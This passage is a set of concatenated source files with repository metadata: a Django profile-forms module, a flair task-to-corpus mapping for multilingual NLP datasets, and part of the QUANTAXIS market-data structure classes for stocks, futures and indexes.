] | 67 | 2022-01-05T18:59:23.000Z | 2022-03-18T13:13:39.000Z | profile/forms.py | ChristopherOloo/KilimoQAPortal | c905a42282bbce70b5477862185ad332185307ce | [
"MIT"
] | 3 | 2022-01-10T10:03:23.000Z | 2022-03-11T16:58:38.000Z | profile/forms.py | ChristopherOloo/KilimoQAPortal | c905a42282bbce70b5477862185ad332185307ce | [
"MIT"
] | 4 | 2022-01-08T17:39:19.000Z | 2022-02-28T07:40:16.000Z | from django import forms
from .models import Profile,Position
from martor.fields import MartorFormField
class EditProfileForm(forms.ModelForm):
    """ModelForm for editing a user's public profile details."""

    class Meta:
        model = Profile
        fields = ['profile_photo','full_name','location','title','about_me',
                  'website_link','twitter_link','github_link',
                  'not_to_Display_Full_name']
class EmailForm(forms.Form):
    """Plain form for sending a message; `review` is a Markdown (martor) field."""
    name = forms.CharField(max_length=25)
    email = forms.EmailField()
    review = MartorFormField()
class PositionCreateForm(forms.ModelForm):
    """ModelForm for creating a job Position (company + title)."""

    class Meta:
        model = Position
        fields = ['company_name','title']
# (db_value, human_label) choices for the job-type field.
# NOTE(review): 'CONTRCT' looks like a typo for 'CONTRACT', but the stored
# value must not be changed here without a data migration.
JOB_TYPE_CHOICES = [
    ('FULL_TIME', 'Full Time'),
    ('CONTRCT', 'Contract'),
    ('InternShip', 'InternShip'),
]
class EditJobPrefrences(forms.ModelForm):
    """ModelForm for a user's job-search preferences.

    NOTE(review): the class name keeps the original spelling ('Prefrences')
    because external code may import it under this name.
    """
    # job_type = forms.MultipleChoiceField(choices=JOB_TYPE_CHOICES, widget=forms.CheckboxSelectMultiple())

    class Meta:
        model = Profile
        fields = ['min_expierence_level',
                  'max_expierence_level','job_type',
                  'job_search_status','phone_number']
        widgets = {
            'job_search_status': forms.RadioSelect(),
            # 'job_type': forms.CheckboxSelectMultiple(),
        }
class EditEmailForm(forms.ModelForm):
    """ModelForm for editing only the profile's e-mail address."""

    class Meta:
        model = Profile
        fields = ['email']
3f19fb7d69cc5c31dcf502a5b3927a78b26451eb | 5,134 | py | Python | flair/corpus_mapping.py | mlej8/MultilangStructureKD | 735a5a3835f63146cd83132c979fa58a9be2dace | [
"MIT"
] | 62 | 2020-04-28T05:05:10.000Z | 2022-03-17T18:26:45.000Z | flair/corpus_mapping.py | mlej8/MultilangStructureKD | 735a5a3835f63146cd83132c979fa58a9be2dace | [
"MIT"
] | 10 | 2020-12-21T21:52:09.000Z | 2021-08-06T13:11:56.000Z | flair/corpus_mapping.py | mlej8/MultilangStructureKD | 735a5a3835f63146cd83132c979fa58a9be2dace | [
"MIT"
] | 7 | 2020-07-09T12:42:00.000Z | 2021-04-28T09:17:38.000Z | corpus_map={'ner':{'eng':'CONLL_03_ENGLISH','en':'CONLL_03','nl':'CONLL_03_DUTCH','es':'CONLL_03_SPANISH','de':'CONLL_03_GERMAN'},
'upos':{'en':'UD_ENGLISH','nl':'UD_DUTCH','es':'UD_SPANISH','de':'UD_GERMAN','fr':'UD_FRENCH','it':'UD_ITALIAN','pt':'UD_PORTUGUESE','zh':'UD_CHINESE','ja':'UD_JAPANESE','ta':'UD_TAMIL','eu':'UD_BASQUE','fi':'UD_FINNISH','he':'UD_HEBREW','ar':'UD_ARABIC','id':'UD_INDONESIAN','cs':'UD_CZECH','fa':'UD_PERSIAN'},
'chunk':{'en':'CONLL_03','de':'CONLL_03_GERMAN'},
'panx':{'en':'PANX-EN','ta':'PANX-TA','fi':'PANX-FI','eu':'PANX-EU','he':'PANX-HE','ar':'PANX-AR','id':'PANX-ID','cs':'PANX-CS','it':'PANX-IT','fa':'PANX-FA','ja':'PANX-JA','sl':'PANX-SL','fr':'PANX-FR','pt':'PANX-PT','de':'PANX-DE','es':'PANX-ES','nl':'PANX-NL'},
'mixedner':{'en':'CONLL_03','nl':'CONLL_03_DUTCH','es':'CONLL_03_SPANISH','de':'CONLL_03_GERMAN','eu':'MIXED_NER-EU','fa':'MIXED_NER-FA','fi':'MIXED_NER-FI','fr':'MIXED_NER-FR','he':'MIXED_NER-HE','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR','id':'MIXED_NER-ID','ja':'MIXED_NER-JA','no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV','ta':'MIXED_NER-TA'},
'lowmixedner':{'en':'MIXED_NER-EN','nl':'MIXED_NER-NL','es':'MIXED_NER-ES','de':'MIXED_NER-DE','eu':'MIXED_NER-EU','fa':'MIXED_NER-FA','fi':'MIXED_NER-FI','fr':'MIXED_NER-FR','he':'MIXED_NER-HE','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR','id':'MIXED_NER-ID','ja':'MIXED_NER-JA','no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV','ta':'MIXED_NER-TA'},
'richmixedner':{'en':'MIXED_NER-EN','nl':'MIXED_NER-NL','es':'MIXED_NER-ES','de':'MIXED_NER-DE'},
'indoeuro1':{'cs':'MIXED_NER-CS','fa':'MIXED_NER-FA','fr':'MIXED_NER-FR','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR'},
'indoeuro2':{'no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV'},
'difffam':{'ce':'MIXED_NER-CE','vi':'MIXED_NER-VI','zh':'MIXED_NER-ZH','ka':'MIXED_NER-KA','eu':'MIXED_NER-EU'},
'turkic':{'az':'MIXED_NER-AZ','kk':'MIXED_NER-KK','tr':'MIXED_NER-TR','ky':'MIXED_NER-KY','tt':'MIXED_NER-TT'},
'austronesian':{'ms':'MIXED_NER-MS','su':'MIXED_NER-SU','tl':'MIXED_NER-TL','id':'MIXED_NER-ID','mg':'MIXED_NER-MG'},
'lowner':{'eu':'MIXED_NER-EU','fa':'MIXED_NER-FA','fi':'MIXED_NER-FI','fr':'MIXED_NER-FR','he':'MIXED_NER-HE','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR','id':'MIXED_NER-ID','ja':'MIXED_NER-JA','no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV','ta':'MIXED_NER-TA'},
'low10ner':{'en':'CONLL_03','nl':'CONLL_03_DUTCH','es':'CONLL_03_SPANISH','de':'CONLL_03_GERMAN','eu':'LOW10_NER-EU','fa':'LOW10_NER-FA','fi':'LOW10_NER-FI','fr':'LOW10_NER-FR','he':'LOW10_NER-HE','hi':'LOW10_NER-HI','hr':'LOW10_NER-HR','id':'LOW10_NER-ID','ja':'LOW10_NER-JA','no':'LOW10_NER-NO','pl':'LOW10_NER-PL','pt':'LOW10_NER-PT','sl':'LOW10_NER-SL','sv':'LOW10_NER-SV','ta':'LOW10_NER-TA'},
'commner':{'en':'COMMNER-EN','es':'COMMNER-ES','fr':'COMMNER-FR','ru':'COMMNER-RU'},
'semeval':{'tr':'SEMEVAL16-TR','es':'SEMEVAL16-ES','nl':'SEMEVAL16-NL','en':'SEMEVAL16-EN','ru':'SEMEVAL16-RU'},
'smallud':{'en':'UD_English-EWT','he':'UD_Hebrew-HTB','ja':'UD_Japanese-GSD','sl':'UD_Slovenian-SST','fr':'UD_French-Sequoia','id':'UD_Indonesian-GSD','fa':'UD_Persian-Seraji','ta':'UD_Tamil-TTB','nl':'UD_Dutch-LassySmall','de':'UD_German-GSD','sv':'UD_Swedish-LinES','it':'UD_Italian-PoSTWITA','es':'UD_Spanish-GSD','cs':'UD_Czech-FicTree','ar':'UD_Arabic-PADT'},
# 'cs':{'en':'CALCS-EN','eg':'CALCS-EG','es':'CALCS-ES','ar':'CALCS-AR'},
'srl':{'en':'SRL-EN','de':'SRL-DE','es':'SRL-ES','zh':'SRL-ZH','cs':'SRL-CS','ca':'SRL-CA'},
'atis':{'en':'ATIS-EN','hi':'ATIS-HI','tr':'ATIS-TR'},
'enhancedud':{'ar':'UD_Arabic','bg':'UD_Bulgarian','cs':'UD_Czech','nl':'UD_Dutch','en':'UD_English','et':'UD_Estonian','fi':'UD_Finnish','fr':'UD_French','it':'UD_Italian','lv':'UD_Latvian','lt':'UD_Lithuanian','pl':'UD_Polish','ru':'UD_Russian','sk':'UD_Slovak','sv':'UD_Swedish','ta':'UD_Tamil','uk':'UD_Ukrainian'},
'dependency':{'ptb':'PTB','ctb':'CTB','en':'UD_English-EWT','he':'UD_Hebrew-HTB','ja':'UD_Japanese-GSD','sl':'UD_Slovenian-SST','fr':'UD_French-Sequoia','id':'UD_Indonesian-GSD','fa':'UD_Persian-Seraji','ta':'UD_Tamil-TTB','nl':'UD_Dutch-LassySmall','de':'UD_German-GSD','sv':'UD_Swedish-LinES','it':'UD_Italian-PoSTWITA','es':'UD_Spanish-GSD','cs':'UD_Czech-FicTree','ar':'UD_Arabic-PADT'},
}
# Pool the five language-group tasks into one combined "mixed_data" task.
corpus_map['mixed_data']={}
corpus_map['mixed_data'].update(corpus_map['indoeuro1'])
corpus_map['mixed_data'].update(corpus_map['indoeuro2'])
corpus_map['mixed_data'].update(corpus_map['difffam'])
corpus_map['mixed_data'].update(corpus_map['turkic'])
corpus_map['mixed_data'].update(corpus_map['austronesian'])
def set_reverse_corpus_map(corpus_map):
    """Invert {task: {language: corpus_name}} into {task: {corpus_name: language}}."""
    return {
        task: {corpus_name: lang for lang, corpus_name in lang_map.items()}
        for task, lang_map in corpus_map.items()
    }
# Build the inverse lookup once at import time.
reverse_corpus_map=set_reverse_corpus_map(corpus_map)
95628b7f76f092081ef5e00f7b27e7fd5066f388 | 23,187 | py | Python | QUANTAXIS/QAData/QADataStruct.py | lxqjswa/QUANTAXIS | a5f89b28a75d1a5094630a4ed166f596840528b1 | [
"MIT"
] | 1 | 2018-09-09T02:55:10.000Z | 2018-09-09T02:55:10.000Z | QUANTAXIS/QAData/QADataStruct.py | lxqjswa/QUANTAXIS | a5f89b28a75d1a5094630a4ed166f596840528b1 | [
"MIT"
] | null | null | null | QUANTAXIS/QAData/QADataStruct.py | lxqjswa/QUANTAXIS | a5f89b28a75d1a5094630a4ed166f596840528b1 | [
"MIT"
] | null | null | null | # coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
定义一些可以扩展的数据结构
方便序列化/相互转换
"""
import datetime
import itertools
import os
import platform
import statistics
import sys
import time
import webbrowser
from copy import copy
from functools import lru_cache, partial, reduce
import numpy as np
import pandas as pd
from pyecharts import Kline
from QUANTAXIS.QAData.base_datastruct import _quotation_base
from QUANTAXIS.QAData.data_fq import QA_data_stock_to_fq
from QUANTAXIS.QAData.data_resample import QA_data_tick_resample, QA_data_day_resample, QA_data_min_resample
from QUANTAXIS.QAData.proto import stock_day_pb2 # protobuf import
from QUANTAXIS.QAData.proto import stock_min_pb2
from QUANTAXIS.QAIndicator import EMA, HHV, LLV, SMA
from QUANTAXIS.QAUtil import (DATABASE, QA_util_log_info,
QA_util_random_with_topic,
QA_util_to_json_from_pandas,
QA_util_to_pandas_from_json, trade_date_sse)
from QUANTAXIS.QAUtil.QADate import QA_util_to_datetime
from QUANTAXIS.QAUtil.QAParameter import FREQUENCE, MARKET_TYPE
class QA_DataStruct_Stock_day(_quotation_base):
    '''Stock daily-bar data structure (OHLCV plus derived fields).'''

    def __init__(self, init_data_by_df, dtype='stock_day', if_fq='bfq'):
        '''
        :param init_data_by_df: DataFrame holding the raw daily bars
        :param dtype: data-struct tag, 'stock_day' (matches this class)
        :param if_fq: adjustment state — 'bfq' (none), 'qfq' (forward), 'hfq' (backward)
        '''
        super().__init__(init_data_by_df, dtype, if_fq)
        # Cleanup: `isinstance(...) == False` replaced by `not isinstance(...)`.
        if not isinstance(init_data_by_df, pd.DataFrame):
            print("QAError init_data_by_df is not kind of DataFrame type !")

    # Abstract-method override: bind the MongoDB collection for stock daily bars.
    def choose_db(self):
        self.mongo_coll = DATABASE.stock_day

    def __repr__(self):
        return '< QA_DataStruct_Stock_day with {} securities >'.format(len(self.code))

    __str__ = __repr__

    def to_qfq(self):
        """Return a forward-adjusted (qfq) struct; only valid from the unadjusted ('bfq') state."""
        # BUG FIX: strings were compared with `is`, which relies on CPython
        # interning and emits SyntaxWarning on modern Python; use `==`.
        if self.if_fq == 'bfq':
            if len(self.code) < 1:
                self.if_fq = 'qfq'
                return self
            else:
                return self.new(
                    self.groupby(level=1).apply(QA_data_stock_to_fq, 'qfq'), self.type, 'qfq')
        else:
            QA_util_log_info(
                'none support type for qfq Current type is: %s' % self.if_fq)
            return self

    def to_hfq(self):
        """Return a backward-adjusted (hfq) struct; only valid from the unadjusted ('bfq') state."""
        if self.if_fq == 'bfq':  # BUG FIX: was `is 'bfq'`
            if len(self.code) < 1:
                self.if_fq = 'hfq'
                return self
            else:
                return self.new(
                    self.groupby(level=1).apply(QA_data_stock_to_fq, 'hfq'), self.type, 'hfq')
        else:
            QA_util_log_info(
                'none support type for qfq Current type is: %s' % self.if_fq)
            return self

    @property
    @lru_cache()
    def high_limit(self):
        'Limit-up price: previous close (plus a rounding epsilon) * 1.1, per code.'
        return self.groupby(level=1).close.apply(lambda x: round((x.shift(1) + 0.0002)*1.1, 2)).sort_index()

    @property
    @lru_cache()
    def low_limit(self):
        'Limit-down price: previous close (plus a rounding epsilon) * 0.9, per code.'
        return self.groupby(level=1).close.apply(lambda x: round((x.shift(1) + 0.0002)*0.9, 2)).sort_index()

    @property
    @lru_cache()
    def next_day_low_limit(self):
        "Next trading day's limit-down price based on today's close."
        return round((self.data.close + 0.0002) * 0.9, 2)

    @property
    @lru_cache()
    def next_day_high_limit(self):
        "Next trading day's limit-up price based on today's close."
        return round((self.data.close + 0.0002) * 1.1, 2)

    @property
    def preclose(self):
        """Previous-close column, or None when the data source lacks it."""
        try:
            return self.data.preclose
        except AttributeError:
            # BUG FIX: was a bare `except:` that also swallowed
            # KeyboardInterrupt/SystemExit.
            return None

    pre_close = preclose

    @property
    def price_chg(self):
        """Daily fractional change vs preclose, or None when preclose is unavailable."""
        try:
            return (self.close-self.preclose)/self.preclose
        except (AttributeError, TypeError):
            # preclose may be None (missing column) -> TypeError on arithmetic.
            return None

    @property
    @lru_cache()
    def week(self):
        return self.resample('w')

    @property
    @lru_cache()
    def month(self):
        return self.resample('M')

    @property
    @lru_cache()
    def quarter(self):
        return self.resample('Q')

    # @property
    # @lru_cache()
    # def semiannual(self):
    #     return self.resample('SA')

    @property
    @lru_cache()
    def year(self):
        return self.resample('Y')

    def resample(self, level):
        """Resample daily bars to a coarser period ('w', 'M', 'Q', 'Y'); returns None on failure."""
        try:
            return self.add_func(QA_data_day_resample, level).sort_index()
        except Exception as e:
            print('QA ERROR : FAIL TO RESAMPLE {}'.format(e))
            return None
class QA_DataStruct_Stock_min(_quotation_base):
    """Stock minute-bar data structure (OHLCV plus derived limit prices)."""

    def __init__(self, DataFrame, dtype='stock_min', if_fq='bfq'):
        super().__init__(DataFrame, dtype, if_fq)
        # Keep only the canonical columns; `preclose` is optional in the source.
        # Cleanup: the original wrapped this in `try/except Exception as e:
        # raise e`, which re-raised the same exception and added nothing.
        if 'preclose' in DataFrame.columns:
            self.data = DataFrame.loc[:, [
                'open', 'high', 'low', 'close', 'volume', 'amount', 'preclose']]
        else:
            self.data = DataFrame.loc[:, [
                'open', 'high', 'low', 'close', 'volume', 'amount']]
        # Derive limit-up/limit-down columns when missing (previous close ±10%).
        if 'high_limit' not in self.data.columns:
            self.data['high_limit'] = round(
                (self.data.close.shift(1) + 0.0002) * 1.1, 2)
        if 'low_limit' not in self.data.columns:
            self.data['low_limit'] = round(
                (self.data.close.shift(1) + 0.0002) * 0.9, 2)
        self.type = dtype
        self.if_fq = if_fq

    # Abstract-method override: bind the MongoDB collection for stock minute bars.
    def choose_db(self):
        self.mongo_coll = DATABASE.stock_min

    def __repr__(self):
        return '< QA_DataStruct_Stock_Min with {} securities >'.format(len(self.code))

    __str__ = __repr__

    def to_qfq(self):
        """Return a forward-adjusted (qfq) struct; only valid from the unadjusted ('bfq') state."""
        # BUG FIX: strings were compared with `is` (identity), which relies on
        # CPython interning and emits SyntaxWarning on modern Python; use `==`.
        if self.if_fq == 'bfq':
            if len(self.code) < 1:
                self.if_fq = 'qfq'
                return self
            else:
                return self.new(
                    self.groupby(level=1).apply(QA_data_stock_to_fq, 'qfq'), self.type, 'qfq')
        else:
            QA_util_log_info(
                'none support type for qfq Current type is:%s' % self.if_fq)
            return self

    def to_hfq(self):
        """Return a backward-adjusted (hfq) struct; only valid from the unadjusted ('bfq') state."""
        if self.if_fq == 'bfq':  # BUG FIX: was `is 'bfq'`
            if len(self.code) < 1:
                self.if_fq = 'hfq'
                return self
            else:
                return self.new(
                    self.groupby(level=1).apply(QA_data_stock_to_fq, 'hfq'), self.type, 'hfq')
        else:
            QA_util_log_info(
                'none support type for qfq Current type is:%s' % self.if_fq)
            return self

    @property
    def high_limit(self):
        'Limit-up price column.'
        return self.data.high_limit

    @property
    def low_limit(self):
        'Limit-down price column.'
        return self.data.low_limit

    def resample(self, level):
        """Resample minute bars to a coarser frequency (e.g. '5min'); returns None on failure."""
        try:
            return self.add_func(QA_data_min_resample, level).sort_index()
        except Exception as e:
            print('QA ERROR : FAIL TO RESAMPLE {}'.format(e))
            return None

    @property
    @lru_cache()
    def min5(self):
        return self.resample('5min')

    @property
    @lru_cache()
    def min15(self):
        return self.resample('15min')

    @property
    @lru_cache()
    def min30(self):
        return self.resample('30min')

    @property
    @lru_cache()
    def min60(self):
        return self.resample('60min')
class QA_DataStruct_Future_day(_quotation_base):
    """Futures daily-bar data structure."""

    def __init__(self, DataFrame, dtype='future_day', if_fq=''):
        # NOTE(review): unlike the stock structs, super().__init__ is not
        # called here and the `dtype` argument is ignored (type hard-coded)
        # — confirm this is intentional.
        self.type = 'future_day'
        self.data = DataFrame.loc[:, [
            'open', 'high', 'low', 'close', 'trade', 'position', 'price']]
        self.if_fq = if_fq

    # Abstract-method override: bind the MongoDB collection for futures daily bars.
    def choose_db(self):
        self.mongo_coll = DATABASE.future_day

    def __repr__(self):
        return '< QA_DataStruct_Future_day with {} securities >'.format(len(self.code))

    __str__ = __repr__
class QA_DataStruct_Future_min(_quotation_base):
    """
    struct for future
    """

    def __init__(self, DataFrame, dtype='future_min', if_fq=''):
        # 🛠todo futures minute data is not maintained yet; daily bars stand
        # in for minute bars for now, hence type is deliberately 'future_day'.
        self.type = 'future_day'
        self.data = DataFrame.loc[:, [
            'open', 'high', 'low', 'close', 'trade', 'position', 'price']]
        self.if_fq = if_fq

    # Abstract-method override: bind the MongoDB collection for futures minute bars.
    def choose_db(self):
        self.mongo_coll = DATABASE.future_min

    def __repr__(self):
        return '< QA_DataStruct_Future_min with {} securities >'.format(len(self.code))

    __str__ = __repr__
class QA_DataStruct_Index_day(_quotation_base):
    'Custom daily-bar data structure for indexes.'

    def __init__(self, DataFrame, dtype='index_day', if_fq=''):
        self.data = DataFrame
        self.type = dtype
        self.if_fq = if_fq
        # self.mongo_coll = eval(
        #     'DATABASE.{}'.format(self.type))
    """
    def __add__(self,DataStruct):
        'add func with merge list and reindex'
        assert isinstance(DataStruct,QA_DataStruct_Index_day)
        if self.if_fq==DataStruct.if_fq:
            self.sync_status(pd.concat())
    """
    # Abstract-method override: bind the MongoDB collection for index daily bars.
    def choose_db(self):
        self.mongo_coll = DATABASE.index_day

    def __repr__(self):
        return '< QA_DataStruct_Index_day with {} securities >'.format(len(self.code))

    __str__ = __repr__
class QA_DataStruct_Index_min(_quotation_base):
    'Custom minute-bar data structure for indexes.'

    def __init__(self, DataFrame, dtype='index_min', if_fq=''):
        self.type = dtype
        self.if_fq = if_fq
        # Keep the canonical index-bar columns, including advancing/declining counts.
        self.data = DataFrame.loc[:, [
            'open', 'high', 'low', 'close', 'up_count', 'down_count', 'volume', 'amount']]
        #self.mongo_coll = DATABASE.index_min
    # Abstract-method override: bind the MongoDB collection for index minute bars.
    def choose_db(self):
        self.mongo_coll = DATABASE.index_min

    def __repr__(self):
        return '< QA_DataStruct_Index_Min with %s securities >' % len(self.code)

    __str__ = __repr__
class QA_DataStruct_Stock_transaction():
def __init__(self, DataFrame):
    """Stock Transaction

    Arguments:
        DataFrame {pd.Dataframe} -- [input is one/multi day transaction]
    """
    self.type = 'stock_transaction'
    self.data = DataFrame
    # Derive the turnover column when the source provides only volume;
    # the *100 multiplier presumably converts lots (hands) to shares —
    # TODO(review): confirm the unit of the volume column.
    if 'amount' not in DataFrame.columns:
        if 'vol' in DataFrame.columns:
            self.data['amount'] = self.data.vol * self.data.price * 100
        elif 'volume' in DataFrame.columns:
            self.data['amount'] = self.data.volume * self.data.price * 100
    self.mongo_coll = DATABASE.stock_transaction
@property
@lru_cache()
def buyorsell(self):
    """Return the trade direction of each tick: 0 = buy, 1 = sell, 2 = none."""
    return self.data.buyorsell

@property
@lru_cache()
def price(self):
    """Return the deal price of each tick transaction."""
    return self.data.price
@property
@lru_cache()
def vol(self):
    """Return the traded volume series of the ticks.

    Data sources name the column either ``volume`` or ``vol``; prefer
    ``volume`` and fall back to ``vol``.
    """
    try:
        return self.data.volume
    except AttributeError:
        # BUG FIX: was a bare `except:` that also swallowed unrelated errors
        # (including KeyboardInterrupt); only a missing `volume` column
        # should trigger the fallback.
        return self.data.vol

volume = vol
@property
@lru_cache()
def date(self):
    """Return the trading date (day granularity) of each transaction."""
    return self.data.date

@property
@lru_cache()
def time(self):
    """Return the intraday time (minute granularity) of each transaction."""
    return self.data.time

@property
@lru_cache()
def datetime(self):
    """Return the full timestamp of each transaction."""
    return self.data.datetime

@property
@lru_cache()
def order(self):
    """Return the order number of each transaction (resets every day)."""
    return self.data.order

@property
@lru_cache()
def index(self):
    """Return the index of the underlying transaction DataFrame."""
    return self.data.index

@property
@lru_cache()
def amount(self):
    """Return the per-tick traded amount (turnover)."""
    return self.data.amount
"""
最新:IF(ISNULL(NEW),PRE,NEW);
IF (ISNULL(RANGE_AVG_PRICE) OR RANGE_AVG_PRICE <= 0)
{
IF (MARKETTYPE == 232 OR MARKETTYPE == 56 OR MARKETTYPE==64 OR MARKETTYPE==128 OR MARKETTYPE==168 OR MARKETTYPE==184 OR MARKETTYPE == 200 OR MARKETTYPE == 80 OR (VOL > 1 AND VOL<100))
{
b=SUBSAMEDAY(&VOL) ;
m=SUM(b*最新,0);
均价:IF(m>0,m/VOL,PRE);
}
ELSE IF(CODETYPE!=0 AND MONEY>0)
{
IF(ISNULL(MONEY) OR ISNULL(VOL) OR VOL==0 OR MONEY==0)
均价:PRE;
ELSE IF(VOL==VOL[1] OR MONEY==MONEY[1])
均价:均价[1];
ELSE
均价:MONEY/VOL;
}
ELSE IF (MARKETTYPE == 176)
{
b=SUBSAMEDAY(&MONEY);
m=SUM(b*最新,0);
IF(m>0)
均价:m/MONEY;
}
}
ELSE
{
均价:RANGE_AVG_PRICE;
}
DRAWGBK(MARKETTYPE==32 AND FORMATTIME(1)<10 AND TRADETIME>242),RGB(0,0,128);
RETURN;
hx_star;
hx_star_p;
"""
def __repr__(self):
return '< QA_DataStruct_Stock_Transaction >'
def __call__(self):
return self.data
def resample(self, type_='1min'):
"""resample methods
Returns:
[type] -- [description]
"""
return QA_DataStruct_Stock_min(QA_data_tick_resample(self.data, type_))
def get_big_orders(self, bigamount=1000000):
"""return big order
Keyword Arguments:
bigamount {[type]} -- [description] (default: {1000000})
Returns:
[type] -- [description]
"""
return self.data.query('amount>={}'.format(bigamount))
def get_medium_order(self, lower=200000, higher=1000000):
"""return medium
Keyword Arguments:
lower {[type]} -- [description] (default: {200000})
higher {[type]} -- [description] (default: {1000000})
Returns:
[type] -- [description]
"""
return self.data.query('amount>={}'.format(lower)).query('amount<={}'.format(higher))
def get_small_order(self, smallamount=200000):
"""return small level order
Keyword Arguments:
smallamount {[type]} -- [description] (default: {200000})
Returns:
[type] -- [description]
"""
return self.data.query('amount<={}'.format(smallamount))
def get_time(self, start, end=None):
if end is None:
return self.data.loc[start]
else:
return self.data.loc[start:end]
class _realtime_base():
"""
realtime 基类
主要字段有:
code/name
time
open/high/low
买卖报价队列:(不同的可能不一样 只提供list)
ask_list[ask1_price/ask1_volume|ask2_price/ask2_volume|ask3_price/ask3_volume....]
bid_list[bid1_price/bid1_volume|bid2_price/bid2_volume|bid3_price/bid3_volume....]
"""
def __init__(self, market_data):
"""转化成dict模式
Arguments:
market_data {[type]} -- [description]
"""
if isinstance(market_data, dict):
self.data = market_data
elif isinstance(market_data, pd.DataFrame):
self.data = QA_util_to_json_from_pandas(market_data)
@property
def open(self):
return self.data.get('open', None)
@property
def price(self):
return self.data.get('price', None)
@property
def datetime(self):
return self.data.get('datetime', None)
@property
def high(self):
return self.data.get('high', None)
@property
def low(self):
return self.data.get('low', None)
@property
def code(self):
return self.data.get('code', None)
@property
def last_close(self):
return self.data.get('last_close', None)
@property
def cur_vol(self):
return self.data.get('cur_vol', None)
@property
def bid1(self):
return self.data.get('bid1', None)
@property
def bid_vol1(self):
return self.data.get('bid_vol1', None)
@property
def bid2(self):
return self.data.get('bid2', None)
@property
def bid_vol2(self):
return self.data.get('bid_vol2', None)
@property
def bid3(self):
return self.data.get('bid3', None)
@property
def bid_vol3(self):
return self.data.get('bid_vol3', None)
@property
def bid4(self):
return self.data.get('bid4', None)
@property
def bid_vol4(self):
return self.data.get('bid_vol4', None)
@property
def bid5(self):
return self.data.get('bid5', None)
@property
def bid_vol5(self):
return self.data.get('bid_vol5', None)
@property
def ask1(self):
return self.data.get('ask1', None)
@property
def ask_vol1(self):
return self.data.get('ask_vol1', None)
@property
def ask2(self):
return self.data.get('ask2', None)
@property
def ask_vol2(self):
return self.data.get('ask_vol2', None)
@property
def ask3(self):
return self.data.get('ask3', None)
@property
def ask_vol3(self):
return self.data.get('ask_vol3', None)
@property
def ask4(self):
return self.data.get('ask4', None)
@property
def ask_vol4(self):
return self.data.get('ask_vol4', None)
@property
def ask5(self):
return self.data.get('ask5', None)
@property
def ask_vol5(self):
return self.data.get('ask_vol5', None)
class QA_DataStruct_Stock_realtime(_realtime_base):
    """Realtime stock quote container built on the _realtime_base accessors."""

    def __init__(self, data):
        # Unlike the base class, no dict conversion is performed here, so a
        # DataFrame input stays a DataFrame (``__repr__`` relies on that:
        # it calls .unique()/.iloc on the accessor results).
        self.data = data

    def __repr__(self):
        # NOTE(review): ``iloc[1]`` is shown as the "start" timestamp --
        # looks like it may have been intended to be iloc[0]; confirm.
        return '< QA_REALTIME_STRUCT code {} start {} end {} >'.format(self.code.unique(), self.datetime.iloc[1], self.datetime.iloc[-1])

    # @property
    # def ask_list(self):
    #     return self.data.loc[:, ['ask1', 'ask_vol1', 'bid1', 'bid_vol1', 'ask2', 'ask_vol2',
    #                              'bid2', 'bid_vol2', 'ask3', 'ask_vol3', 'bid3', 'bid_vol3', 'ask4',
    #                              'ask_vol4', 'bid4', 'bid_vol4', 'ask5', 'ask_vol5', 'bid5', 'bid_vol5']]

    # @property
    # def bid_list(self):
    #     return self.data.loc[:, ['bid1', 'bid_vol1', 'bid2', 'bid_vol2', 'bid3', 'bid_vol3', 'bid4', 'bid_vol4', 'bid5', 'bid_vol5']]

    @property
    def _data(self):
        """
        return a dataframe-type result
        """
        return pd.DataFrame(self.data)

    @property
    def ab_board(self):
        """ask_bid board -- human-readable depth ladder:

            bid3 bid_vol3
            bid2 bid_vol2
            bid1 bid_vol1
            ===============
            price /cur_vol
            ===============
            ask1 ask_vol1
            ask2 ask_vol2
            ask3 ask_vol3
        """
        # The backslash-continued literal below is a single string; the
        # continuation line starts at column 0 so no stray spaces leak in.
        return 'BID5 {} {} \nBID4 {} {} \nBID3 {} {} \nBID2 {} {} \nBID1 {} {} \n============\nCURRENT {} {} \n============\
\nASK1 {} {} \nASK2 {} {} \nASK3 {} {} \nASK4 {} {} \nASK5 {} {} \nTIME {} CODE {} '.format(
            self.bid5, self.bid_vol5, self.bid4, self.bid_vol4, self.bid3, self.bid_vol3, self.bid2, self.bid_vol2, self.bid1, self.bid_vol1,
            self.price, self.cur_vol,
            self.ask1, self.ask_vol1, self.ask2, self.ask_vol2, self.ask3, self.ask_vol3, self.ask4, self.ask_vol4, self.ask5, self.ask_vol5,
            self.datetime, self.code
        )

    def serialize(self):
        """to_protobuf -- not implemented yet."""
        pass

    def resample(self, level):
        # Delegates to the shared tick-resampling helper defined elsewhere
        # in this package.
        return QA_data_tick_resample(self.data, level)
class QA_DataStruct_Stock_realtime_series():
    """A time series of realtime snapshots plus a concatenated table view.

    Arguments:
        sr_series -- non-empty sequence of QA_DataStruct_Stock_realtime
